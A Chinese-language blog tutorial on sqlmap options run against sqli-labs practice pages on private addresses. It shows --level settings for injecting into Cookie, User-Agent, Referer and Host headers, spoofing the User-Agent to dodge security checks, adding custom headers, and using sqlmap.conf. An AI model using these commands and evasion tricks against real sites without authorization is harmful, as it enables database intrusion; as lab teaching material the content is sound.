--level的参数设定为2或者2以上的时候,sqlmap会尝试注入Cookie参数。当--level参数设定为3或者3以上的时候,会尝试对User-Angent和referer进行注入。

--user-agent=AGENT指定HTTP User – Agent头
默认情况下sqlmap的HTTP请求头中User-Agent值是:sqlmap/1.0-dev-xxxxxxx (http://sqlmap.org)
可以使用--user-agent来伪造
使用Firefox浏览器访问页面时的User-Agent
在这里插入图片描述
使用python sqlmap.py -u "http://172.17.0.1/Less-1/index.php/?id=1" --banner并用wireshark抓取http包,查看User-Agent
在这里插入图片描述
为了避免触发安全机制,使用参数设置User-Agent

  1. python sqlmap.py -u "http://172.17.0.1/Less-1/index.php/?id=1" --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" --banner

此时可以看到User-Agent头改变
在这里插入图片描述
也可以使用--random-agent使用随机选定的HTTP User – Agent头

  1. python sqlmap.py -u "http://172.17.0.1/Less-1/index.php/?id=1" --random-agent

在这里插入图片描述
查看可使用的User – Agent

  1. root@rane:/usr/share/sqlmap# ls
  2. COMMITMENT  data  doc  extra  http.txt  lib  LICENSE  plugins  README.md  sqlmapapi.py  sqlmap.conf  sqlmap.py  tamper  test  test.txt  thirdparty  url.txt  wget-log
  3. root@rane:/usr/share/sqlmap# cd data
  4. root@rane:/usr/share/sqlmap/data# ls
  5. html  procs  shell  txt  udf  xml
  6. root@rane:/usr/share/sqlmap/data# cd txt
  7. root@rane:/usr/share/sqlmap/data/txt# ls
  8. common-columns.txt  common-files.txt  common-outputs.txt  common-tables.txt  keywords.txt  smalldict.txt  user-agents.txt  wordlist.tx_

可以在user-agents.txt中查看可使用的User – Agent
注意:针对User – Agent的值探测SQL注入,需要设置 --level值为3
以Less-18为例
在这里插入图片描述
开启burpsuite进行截断,将请求放入test.txt中
在这里插入图片描述
使用sqlmap进行自动化探测

  1. python sqlmap.py -r test.txt --level 3

在这里插入图片描述
如果使用python sqlmap.py -r test.txt不加--level 3,则不会对User – Agent进行探测

对HTTP主机头进行SQL注入,需要设置--level为5

以Less19为例
在这里插入图片描述
如果直接使用python sqlmap.py -r test.txt会提示
在这里插入图片描述
当设置level参数时

  1. python sqlmap.py -r test.txt --level 3

在这里插入图片描述

方式一:
通过设置选项--headers,可以提供额外的HTTP头,每个头必须用换行符分割

  1. python sqlmap.py -u "http://192.168.126.130/Less-1/index.php/?id=1" --headers="Accept-Language: fr\nETag: 123"

在这里插入图片描述
可以看到设置成功
设置多个时,使用分隔符\'\n\'

  1. python sqlmap.py -u "http://192.168.126.130/Less-1/index.php/?id=1" --headers="Accept-Language: fr\nETag: 123\nCookie:123"

在这里插入图片描述
方式二:
从sqlmap.conf文件中设置

  1. root@rane:/usr/share/sqlmap# ls
  2. COMMITMENT  data  doc  extra  http.txt  lib  LICENSE  plugins  README.md  sqlmapapi.py  sqlmap.conf  sqlmap.py  tamper  test.txt  thirdparty  url.txt  wget-log
  3. root@rane:/usr/share/sqlmap# cat sqlmap.conf
  4. # At least one of these options has to be specified to set the source to
  5. # get target URLs from.
  6. [Target]
  7. ...

修改完sqlmap.conf后使用

  1. python sqlmap.py -c sqlmap.conf

版权声明:本文为rane-blog原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://www.cnblogs.com/rane-blog/p/12586770.html